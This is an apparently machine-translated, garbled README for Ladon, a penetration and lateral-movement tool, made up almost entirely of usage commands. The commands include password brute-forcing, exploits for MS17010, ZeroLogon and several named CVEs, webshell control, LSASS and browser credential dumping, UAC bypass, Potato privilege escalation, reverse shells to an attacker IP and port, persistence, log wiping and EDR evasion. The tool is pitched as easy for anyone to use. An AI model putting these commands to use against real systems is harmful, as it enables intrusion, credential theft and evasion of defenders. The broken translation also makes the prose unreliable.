Ladon đại hình nội võng thẩm thấu \ vực thẩm thấu \ nằm ngang công cụ, nhưng PowerShell mô khối hóa, nhưng CS cắm kiện hóa, nhưng nội tồn thêm tái, vô văn kiện rà quét. Hàm cảng rà quét, phục vụ phân biệt, internet tài sản dò xét, mật mã thẩm kế, cao nguy lỗ hổng kiểm tra đo lường, lỗ hổng lợi dụng, mật mã đọc lấy cùng với một kiện GetShell, duy trì phê lượng A đoạn /B đoạn /C đoạn cùng với vượt võng đoạn rà quét, duy trì URL, trưởng máy, vực danh danh sách rà quét chờ. 12.2 phiên bản nội trí 262 công năng mô khối, internet tài sản dò xét mô khối 30+ hiệp nghị (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) cùng với phương pháp nhanh chóng thu hoạch mục tiêu internet tồn tại trưởng máy IP, máy tính danh, công tác tổ, cùng chung tài nguyên, võng tạp địa chỉ, thao tác hệ thống phiên bản, trang web, tử vực danh, trung gian kiện, mở ra phục vụ, bộ định tuyến, tổng đài điện thoại, cơ sở dữ liệu, máy in chờ tin tức, cao nguy lỗ hổng kiểm tra đo lường 16+ bao hàm Cisco, Zimbra, Exchange, DrayTek, MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, Struts2 hệ liệt, Printer chờ, mật mã thẩm kế 25+ hàm cơ sở dữ liệu (Mysql, Oracle, MSSQL), FTP, SSH, VNC, Windows(LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar chờ, viễn trình chấp hành mệnh lệnh bao hàm (smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web vân tay phân biệt mô khối nhưng phân biệt 135+ ( Web ứng dụng, trung gian kiện, kịch bản gốc loại hình, giao diện loại hình ) chờ, bản địa đề quyền 21+ hàm SweetPotato\BadPotato\EfsPotato\BypassUAC, nhưng độ cao tự định nghĩa cắm kiện POC duy trì.NET trình tự tập, DLL(C#/Delphi/VC), PowerShell chờ ngôn ngữ biên soạn cắm kiện, duy trì thông qua phối trí INI phê lượng thuyên chuyển tùy ý phần ngoài trình tự hoặc mệnh lệnh, EXP sinh thành khí nhưng một kiện sinh thành lỗ hổng POC nhanh chóng mở rộng rà quét năng lực. Ladon duy trì Cobalt Strike cắm kiện hóa rà quét nhanh chóng mở rộng nội võng tiến hành nằm ngang di động.
Tuy rằng Ladon công năng phong phú đa dạng, nhưng sử dụng lại phi thường đơn giản, bất luận kẻ nào đều có thể dễ dàng thượng thủ
Chỉ cần một hoặc hai cái tham số liền nhưng dùng 90% công năng, một cái mô khối tương đương với một cái tân công cụ
Ladon nhưng ở trang bị có.net 2.0 cập trở lên phiên bản Win hệ thống trung sử dụng (Win7 sau hệ thống tự mang.net)
Như Cmd, PowerShell, xa khống Cmd, WebShell chờ, cùng với Cobalt Strike nội tồn thêm tái sử dụng
Ladon.ps1 hoàn mỹ kiêm dung Win7-Win11/2022 PowerShell, không xem phiên bản viễn trình thêm tái vô văn kiện thẩm thấu
Toàn ngôi cao: Linux, MacOS, Windows, bộ định tuyến, internet thiết bị chờ OS hệ thống
https://github /k8gege/LadonGo
Thực chiến cũng không thuận lợi vậy, có chút nội võng chuyển phát sau thực tạp hoặc vô pháp chuyển phát, chỉ có thể đem công cụ thượng truyền đến mục tiêu
Có chút mã khả năng thượng truyền hai ba M trình tự đều phải nửa ngày thậm chí căn bản truyền không được, PY mấy chục M liền càng đừng nghĩ
Ladon chọn dùng C# nghiên cứu phát minh, trình tự thể tích rất nhỏ 500K tả hữu, mặc dù mã không được cũng có thể thượng truyền 500K trình tự đi
Còn không được cũng có thể PowerShell viễn trình nội tồn thêm tái, điểm này là PY hoặc GO biên dịch đại trình tự vô pháp bằng được
Một con rồng phục vụ, vì người dùng cung cấp một cái đơn giản dễ dùng, công năng phong phú, độ cao linh hoạt rà quét công cụ
Rà quét lưu lượng tiểu
Trình tự thể tích tiểu
Công năng phong phú cường đại
Trình tự đơn giản dễ dùng
Cắm kiện duy trì nhiều loại ngôn ngữ
Vượt ngôi cao (Win/Kali/Ubuntu) chờ
Duy trì Cobalt Strike cắm kiện hóa
Duy trì PowerShell vô văn kiện thẩm thấu
Exp sinh thành khí nhưng một kiện sinh thành Poc
Nhiều phiên bản áp dụng các loại hoàn cảnh
1 duy trì chỉ định IP rà quét
2 duy trì chỉ định vực danh rà quét
3 duy trì chỉ định máy móc danh rà quét
4 duy trì chỉ định C đoạn rà quét (ip/24)
5 duy trì chỉ định B đoạn rà quét (ip/16)
6 duy trì chỉ định A đoạn rà quét (ip/8)
7 duy trì chỉ định URL rà quét
8 duy trì phê lượng IP rà quét (ip.txt)
9 duy trì phê lượng C đoạn rà quét (ip24.txt)
10 duy trì phê lượng C đoạn rà quét (ipc.txt)
11 duy trì phê lượng B đoạn rà quét (ip16.txt)
12 duy trì phê lượng URL rà quét (url.txt)
13 duy trì phê lượng vực danh rà quét (domain.txt)
14 duy trì phê lượng máy móc danh rà quét (host.txt)
15 duy trì phê lượng quốc gia đoạn rà quét (cidr.txt)
16 duy trì phê lượng tự phù xuyến danh sách (str.txt)
17 duy trì trưởng máy trướng mật danh sách (check.txt)
18 duy trì người dùng mật mã danh sách (userpass.txt)
19 duy trì chỉ định phạm vi C đoạn rà quét
20 duy trì tham số thêm tái tự định nghĩa DLL ( giới hạn C# )
21 duy trì tham số thêm tái tự định nghĩa EXE ( giới hạn C# )
22 duy trì tham số thêm tái tự định nghĩa INI phối trí văn kiện
23 duy trì tham số thêm tái tự định nghĩa PowerShell
24 duy trì tự định nghĩa trình tự ( hệ thống mệnh lệnh hoặc kẻ thứ ba trình tự tức tùy ý ngôn ngữ khai phá trình tự hoặc kịch bản gốc )
25 cắm kiện ( duy trì nhiều loại ngôn ngữ C#/Delphi/Golang/Python/VC/PowerShell)
26 duy trì Cobalt Strike(beacon mệnh lệnh hành hạ rà quét mục tiêu nội võng hoặc ván cầu rà quét ngoại võng mục tiêu )
27 duy trì CIDR cách thức IP rà quét, như 100.64.0.0/10, 192.168.1.1/20 chờ
28 INI phối trí duy trì tự định nghĩa trình tự mật mã bạo phá
Ladon đơn giản rõ ràng sử dụng giáo trình hoàn chỉnh hồ sơ:http://k8gege.org/Ladon
Duy trì Cmd, Cobalt Strike, PowerShell chờ nội tồn thêm tái
Windows phiên bản:.Net, Cobalt Strike, PowerShell
Toàn hệ thống phiên bản: GO( toàn ngôi cao ), Python( lý luận thượng toàn ngôi cao )
PS: Study phương tiện bản địa học tập sử dụng, hoàn chỉnh công năng thỉnh sử dụng CMD
Cam chịu rà quét tốc độ thực mau, có chút WAF hoặc EDR phòng ngự rất mạnh
Thiết trí mấy tuyến trình đều có khả năng 20 phút tả hữu liền không thể quét
bypassEDR bắt chước nhân công phỏng vấn, vòng qua tốc độ kiểm tra đo lường sách lược
Rà quét tốc độ so chậm, theo đuổi tốc độ lăng đầu thanh không cần sử dụng
Ladon 10.1.2.8/24 MS17010 bypassEDR
Mật mã bạo phá tương quan mô khối tạm không duy trì bypassEDR tham số
Ví dụ: Rà quét mục tiêu 10.1.2 đoạn hay không tồn tại MS17010 lỗ hổng
Đơn tuyến trình:
Ladon 10.1.2.8/24 MS17010 t=1
80 tuyến trình:
Ladon noping 10.1.2.8/24 MS17010 t=80
Cao cường độ phòng hộ hạ rà quét tuyến trình thiết trí thấp một ít, F đơn tuyến trình
Ladon 10.1.2.8/24 MS17010 f=1
Ví dụ: Sử dụng 8 tuyến trình rà quét mục tiêu 10.1.2 đoạn hay không tồn tại MS17010 lỗ hổng
Ladon noping 10.1.2.8/24 MS17010 t=8<br>
Tường thấy:http://k8gege.org/Ladon/proxy.html
PS: Đại lý công cụ không duy trì Socks5, cho nên cần thiết thêm noping tham số rà quét
Mặc kệ là Frp vẫn là cái khác đồng loại công cụ, chính yếu là Proxifier chờ công cụ không duy trì ICMP hiệp nghị
Bởi vì Ladon cam chịu trước dùng ICMP dò xét tồn tại sau, mới sử dụng đối ứng mô khối thí nghiệm
Cho nên đại lý hoàn cảnh hạ đến cấm ping rà quét, hệ thống ping sử dụng chính là ICMP hiệp nghị
CIDR cách thức: Không chỉ là /24/16/8( sở hữu )
Ladon 192.168.1.8/24 rà quét mô khối
Ladon 192.168.1.8/16 rà quét mô khối
Ladon 192.168.1.8/8 rà quét mô khối
Chữ cái cách thức: Chỉ C đoạn B đoạn A đoạn trình tự bài tự
Ladon 192.168.1.8/c rà quét mô khối
Ladon 192.168.1.8/b rà quét mô khối
Ladon 192.168.1.8/a rà quét mô khối
Ladon 192.168.1.50-192.168.1.200 ICMP
Ladon 192.168.1.30-192.168.50.80 ICMP
TXT cách thức
Ladon ip24.txt ICMP
Ladon ipc.txt ICMP
Ladon ip16.txt ICMP
Ladon cidr.txt ICMP
Ladon domain.txt ICMP
008 ICMP phê lượng rà quét máy móc hay không tồn tại sử dụng trưởng máy danh hoặc máy móc danh dò xét
Ladon host.txt ICMP
009 WhatCMS phê lượng phân biệt CMS, Banner, SSL giấy chứng nhận, tiêu đề, nhưng phân biệt không biết CMS, bộ định tuyến, máy in, internet thiết bị, cameras chờ
Ladon 192.168.1.8 WhatCMS rà quét IP
Ladon 192.168.1.8/24 WhatCMS rà quét C đoạn
Ladon 192.168.1.8/C WhatCMS rà quét C đoạn
Ladon 192.168.1.8/B WhatCMS rà quét B đoạn
Ladon 192.168.1.8/A WhatCMS rà quét A đoạn
Ladon IP.TXT WhatCMS rà quét IP danh sách
Ladon IP24.TXT WhatCMS rà quét C đoạn danh sách
Ladon IP16.TXT WhatCMS rà quét B đoạn danh sách
Ladon cidr.TXT WhatCMS rà quét toàn bộ quốc gia IP đoạn danh sách
Cấm PING rà quét<br>
Ladon noping 192.168.1.8 WhatCMS rà quét IP
Ladon noping 192.168.1.8/24 WhatCMS rà quét C đoạn
Ladon url.txt DraytekPoc
Ladon str.txt DeBase64
Ladon 192.168.1.8/24 ICMP
013 Ping dò xét tồn tại trưởng máy ( thuyên chuyển hệ thống Ping mệnh lệnh hồi hiện ms, ttl chờ tin tức )
Ladon 192.168.1.8/24 Ping
Nếu ngươi cho rằng ping mệnh lệnh người tài năng là tồn tại, có thể sử dụng này mệnh lệnh phê lượng
014 nhiều hiệp nghị dò xét tồn tại trưởng máy ( IP, máy móc danh, MAC/ vực danh, chế tạo thương / hệ thống phiên bản )
Ladon 192.168.1.8/24 OnlinePC
015 nhiều hiệp nghị phân biệt thao tác hệ thống ( IP, máy móc danh, thao tác hệ thống phiên bản, mở ra phục vụ )
Ladon 192.168.1.8/24 OsScan
Ladon 192.168.1.8/24 EthScan
Ladon 192.168.1.8/24 OxidScan
Ladon 192.168.1.8/24 DnsScan
Ladon 192.168.1.8/24 OnlineIP
Ladon 192.168.1.8/24 MS17010
020 SMBGhost lỗ hổng kiểm tra đo lường CVE-2020-0796 ( IP, máy móc danh, lỗ hổng đánh số, thao tác hệ thống phiên bản )
Ladon 192.168.1.8/24 SMBGhost
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
Ladon 192.168.1.8/24 UrlScan
Ladon 192.168.1.8/24 SameWeb
Ladon baidu SubDomain
Ladon baidu DomainIP
Ladon baidu HostIP
Ladon domain.txt DomainIP
Ladon host.txt HostIP
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
Ladon AdiDnsDump 192.168.1.8
Ladon GetDomainIP
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
Ladon 192.168.1.8/24 WhatCMS
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
Ladon EnumMssql
Ladon EnumShare
Ladon 192.168.1.8/24 LdapScan
Ladon 192.168.1.8/24 FtpScan
Bạo lực phá giải / internet chứng thực / nhược khẩu lệnh / mật mã bạo phá / cơ sở dữ liệu / trang web hậu trường / đổ bộ khẩu / hệ thống đổ bộ
Mật mã bạo phá tường giải tham khảo SSH:http://k8gege.org/Ladon/sshscan.html
Ladon 192.168.1.8/24 SmbScan
Ladon 192.168.1.8/24 WmiScan
Ladon 192.168.1.8/24 LdapScan
Ladon 192.168.1.8/24 WinrmScan
Ladon 192.168.1.8/24 SmbHashScan
Ladon 192.168.1.8/24 WmiHashScan
Ladon 192.168.1.8/24 SshScan
Ladon 192.168.1.8:22 SshScan
Ladon 192.168.1.8/24 MssqlScan
Ladon 192.168.1.8/24 OracleScan
Oracle cơ sở dữ liệu tương đối đặc thù, chỉ bạo ORCL kho sẽ bỏ lỡ rất nhiều quyền hạn
Tường thấy:http://k8gege.org/Ladon/OracleScan.html
Ladon 192.168.1.8/24 MysqlScan
Ladon http://192.168.1.8:7001/console WeblogicScan<br>
Ladon 192.168.1.8/24 WeblogicScan
Ladon 192.168.1.8/24 VncScan
Ladon 192.168.1.8/24 FtpScan
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
Ladon http://192.168.1.8/login HttpBasicScan
Ladon ip.txt 401Scan
Ladon 192.168.1.8/24 SmbScan.ini
Ladon 192.168.1.8/24 IpcScan.ini
Ladon 192.168.1.8/24 NbtScan
Ladon 192.168.1.8/24 WinrmScan
Ladon 192.168.1.8/24 DvrScan
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/24 SMBGhost
Ladon 192.168.1.8/24 WeblogicPoc
Ladon 192.168.1.8/24 PhpStudyPoc
Ladon 192.168.1.8/24 ActivemqPoc
Ladon 192.168.1.8/24 TomcatPoc
Ladon 192.168.1.8/24 Struts2Poc
062 DraytekPoc CVE-2020-8515 lỗ hổng kiểm tra đo lường, Draytek phiên bản dò xét, nhược khẩu lệnh kiểm tra đo lường
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
Ladon 192.168.1.8/24 WeblogicExp
Ladon 192.168.1.8/24 TomcatExp
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=<br>
Ladon CmdDll b64x64 YwBhAGwAYwA=
Ladon CVE-2021-40444 MakeCab poc.dll<br>
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
Ladon DraytekExp http://192.168.1.8 whoami
Ladon ZeroLogon dc.k8gege.org
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 ForExec tuần hoàn lỗ hổng lợi dụng (Win10 vĩnh hằng chi hắc CVE-2020-0796, thành công rời khỏi để tránh mục tiêu lam bình )
Ladon ForExec"CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt"80"Exploit finnished"
Ladon wget https://downloads.metasploit /data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
Ladon 123456 EnHex
Ladon 313233343536 DeHex
Ladon 123456 EnBase64
Ladon MTIzNDU2 DeBase64
Ladon str.txt DeBase64
Ladon FtpSniffer 192.168.1.5
Ladon HTTPSniffer 192.168.1.5
Ladon Sniffer
Ladon IISpwd
Ladon WifiPwd
Ladon FileZillaPwd
Ladon CVE-2021-36934
Ladon DumpLsass
Ladon GetIP
Ladon GetID
Ladon Recent
Ladon UsbLog
Ladon CheckDoor
Ladon AutoRun
Ladon EnumProcess
Ladon Tasklist
Ladon cmdline
Ladon cmdline cmd.exe
Ladon GetInfo
Ladon GetInfo2
Ladon NetVer
Ladon PSver
Ladon NetVersion
Ladon PSversion
Ladon Ver<br>
Ladon Version
Ladon AllVer
Ladon AllVersion
Ladon QueryProxy
Ladon DirList
Ladon DirList c:\
Ladon QueryAdmin
Ladon GetPipe
Ladon RdpLog
net use\\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec>whoami
nt authority\system
Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami
Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
Usage: Ladon JspShell type url pwd cmd
Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
Usage: Ladon WebShell ScriptType ShellType urlpwdcmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspxcdhttp://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami
Thu hoạch hệ thống phiên bản tin tức phương tiện đề quyền
Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo
105 135 cảng WmiExec2 viễn trình chấp hành mệnh lệnh duy trì HASH ( phi lẫn nhau thức ) duy trì văn kiện thượng truyền
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami trước Mimikatz rót vào Hash, lại pth chấp hành mệnh lệnh
Base64CmdforCobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe trước Mimikatz rót vào Hash, lại pth chấp hành mệnh lệnh
Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami
Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe
Ladon whoami
Cách dùng: Ladon BypassUAC Method Base64Cmd
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
Ladon BypassUac2 c:\1.exe
Ladon BypassUac2 c:\1.bat
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
Ladon SpoolFool poc.dll
Ladon CVE-2022-21999 poc.dll
Ladon GetSystem cmd.exe
Ladon GetSystem cmd.exe explorer
Ladon Runas user pass cmd
Ladon ms16135 whoami>=9.2.1 phiên bản di trừ 911 giữ lại
Ladon BadPotato cmdline
Ladon SweetPotato cmdline
Ladon EfsPotato whoami
Ladon Open3389
Ladon ActiveAdmin
Ladon ActiveGuest
Ladon ReverseTcp 192.168.1.8 4444 nc
Ladon ReverseTcp 192.168.1.8 4444 shell
Ladon ReverseTcp 192.168.1.8 4444 meter
Ladon ReverseHttp 192.168.1.8 4444
Ladon ReverseHttps 192.168.1.8 4444
Ladon PowerCat 192.168.1.8 4444 cmd
Ladon PowerCat 192.168.1.8 4444 psh
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
Ladon netsh add 888 192.168.1.112 22
VPS nghe lén: Ladon PortTran 8000 338
Mục tiêu chuyển phát: Ladon PortTran nội võng IP 3389 VPS_IP 8000
Bổn cơ liên tiếp: mstsc VPS_IP:338
Ladon RdpHijack 3
Ladon RdpHijack 3 console
Ladon RegAuto Test c:\123.exe
Ladon at c:\123.exe
Ladon at c:\123.exe gui
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName
Ladon 192.168.1.8/24 SnmpInfo
Ladon 192.168.1.8/24 NbtInfo
Ladon 192.168.1.8/24 SmbInfo
Ladon 192.168.1.8/24 WmiInfo
Ladon 192.168.1.8/24 MssqlInfo
Ladon 192.168.1.8/24 WinrmInfo
Ladon 192.168.1.8/24 ExchangeInfo
Ladon 192.168.1.8/24 RdpInfo
Ladon EnableDotNet
Ladon gethtml http://192.168.1.1
Ladon web 80
Ladon web 80 dir
Thu hoạch ngoại võng IP(VPS thượng khởi động WEB, mục tiêu phỏng vấn ip.txt hoặc ip.jpg) http://192.168.1.8/ip.txt
Ladon web 800
certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw
Ladon 192.168.1.8/24 IsShiro
Ladon LogDelTomcat access.log 192.168.1.8
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24*.dll(c#)
Ladon ReadFile c:\k8.exe cam chịu 1k
Ladon ReadFile c:\k8.exe 1K
Ladon ReadFile c:\k8.exe 1024K
Ladon ReadFile c:\k8.exe 1M
Ladon SetMzLogonPwd 1
Ladon SetSignAuth 1
Ladon ip.txt IP24
Ladon ip.txt IPC
Ladon ip.txt IPB
Ladon url.txt CVE-2022-26134
Ladon EXP-2022-26134 https://111.123.123.123 id
Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort
Ladon RevShell-2022-26134 http://xxx:8090 123.123.123.123 4444
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo chỉ định cảng
Ladon noping fbi.gov SslInfo cấm ping dò xét
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 SslInfo giấy chứng nhận phê lượng dò xét thiết bị, IP, vực danh, máy móc danh, tổ chức cơ cấu chờ tin tức
Ladon ip.txt SslInfo
Ladon url.txt SslInfo
Ladon 192.168.1.1/c SslInfo
Ladon 192.168.1.1/b SslInfo
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo cấm ping dò xét
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
Ladon ip.txt WPinfo
Ladon url.txt WPinfo
Ladon 192.168.1.1/c WPinfo
Ladon 192.168.1.1/b WPinfo
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8, 24 ExchangeScan
Ladon 192.168.1.8 CVE-2022-27925
Ladon http://zimbra.k8gege.org CVE-2022-27925
Ladon ip.txt CVE-2022-27925
Ladon url.txt CVE-2022-27925
Ladon 192.168.1.1/c CVE-2022-27925
Ladon 192.168.1.1/b CVE-2022-27925
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
Ladon FindIP ipc.txt ISVUL.txt ( chính xác tìm tòi )
Ladon FindIP ipc.txt ISVUL.txt like ( mơ hồ tìm tòi )
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd phê lượng dò xét Cisco lỗ hổng cũng đạo ra người dùng mật mã
Ladon 192.168.1.8 PrinterPoc
Ladon ip.txt PrinterPoc
Cấm ping máy móc rà quét sử dụng noping
Ladon noping 192.168.1.8 PrinterPoc
Ladon noping ip.txt PrinterPoc
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
174 Cisco VPN bộ định tuyến mật mã bạo phá ( nội trí cam chịu mật mã, duy trì văn bản rõ ràng, Hash)
Ladon 192.168.1.8/24 CiscoScan
Ladon https://192.168.1.8 CiscoScan
Ladon ip.txt CiscoScan
Ladon url.txt CiscoScan
175 vsFTPdPoc CVE-2011-2523 vsftpd 2.3.4 gương mặt tươi cười cửa sau lỗ hổng kiểm tra đo lường 10.9 di trừ
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc
Ladon http://192.168.1.8 WpScan
Ladon url.txt WpScan
Ladon 192.168.1.8/24 WpScan http rà quét IP khi tăng thêm http://
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
Ladon https://192.168.1.8 ExchangePoc
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http rà quét IP khi tăng thêm http://
Ladon ip.txt GetHead https rà quét IP khi tăng thêm https://
Ladon https://192.168.1.8 GetHtml
Ladon ip.txt GetHtml
Ladon 192.168.1.8/24 GetHtml http
Ladon ip.txt GetHtml https rà quét IP khi tăng thêm https://
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https rà quét IP khi tăng thêm https://
182 TrueIP vòng qua CDN thu hoạch vực danh chân thật IP( nhưng dùng vực danh, tiêu đề, Banner chờ duy nhất mấu chốt tự đặc thù )
Ladon ip.txt TrueIP k8gege.org
Ladon 192.168.1.8/24 TrueIP k8gege.org
Ladon ip.txt TrueIP"K8 ca ca"
Ladon 192.168.1.8/24 TrueIP"K8 ca ca"
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
Ladon40 BypassUAC11 cmd
Ladon40 BypassUAC11 c:\1.bat
Ladon40 BypassUAC11 c:\1.exe
Ladon GetPwd
Ladon 192.168.1.8 DraytekScan
Ladon https://192.168.1.8 DraytekScan
Ladon 192.168.1.8/24 DraytekScan
Ladon url.txt DraytekScan
Ladon XshellPwd
Ladon 192.168.1.8 CVE-2022-40684
Ladon https://192.168.1.8 CVE-2022-40684
Ladon 192.168.1.8/24 CVE-2022-40684
Ladon url.txt CVE-2022-40684
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
Ladon 192.168.1.8 ZteScan
Ladon ip.txt ZteScan
Ladon http://192.168.1.8 ZteScan
Ladon url.txt ZteScan
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
Ladon https://192.168.1.8 NetGearPwd
Ladon url.txt NetGearPwd
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info
Ladon 192.168.1.8/24 InfoScan
Ladon 192.168.1.8 InfoScan
Ladon ip.txt InfoScan
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
Ladon 192.168.1.8/24 ExpScan
Ladon 192.168.1.8 ExpScan
Ladon http://192.168.1.8 ExpScan
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
Ladon 192.168.1.8/24 AllScan
Ladon 192.168.1.8 AllScan
Ladon http://192.168.1.8 AllScan
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
Ladon https://192.168.1.8 VmwareVer
Ladon 192.168.1.8/24 VmwareVer
Ladon url.txt VcenterVer
Ladon RunPS -f hello.ps1
Ladon RunPS -c"echo test"
Ladon RunPS bypass
Ladon RunPS default
Ladon HPreboot 192.168.1.8
Ladon HPreboot 192.168.1.8 public
Ladon Clslog
Ladon 192.168.1.8 ArpInfo
Ladon 192.168.1.8/24 ArpInfo
207 mini FTP server, ( duy trì windows/Linux tự mang ftp mệnh lệnh thực hiện văn kiện thượng truyền xuống tái )
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
Ladon Tcp 8080
Ladon TcpServer 80
Ladon UdpServer 8080
Ladon Udp 161
Ladon PortForward<localPort><targetHost><targetPort>
Example:
Ladon PortForward 338 192.168.1.8 3389
Test: mstsc 127.0.0.1 338
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537
Ladon EXP-2022-36537 url
Ladon EXP-2022-36537 url /WEB-INF/web.xml
Ladon CloseSMB
Ladon DisService Spooler
Ladon DisableService Spooler
Ladon StopService Spooler
Ladon OpenTCP 445
Ladon OpenUDP 161
Ladon CloseTCP 445
Ladon CloseUDP 161
Ladon RunToken explorer cmd.exe
Ladon RunToken explorer c:\1.bat
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
Ladon RunUser cmd.exe
Ladon RunUser c:\1.exe
Ladon GodPotato whoami
Ladon 192.168.1.8/24 HikvisionScan
Ladon http://192.168.1.8:8080 HikvisionScan
Ladon url.txt HikvisionScan
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
Ladon HikvisionDecode configurationFile
Ladon web 800 cmd
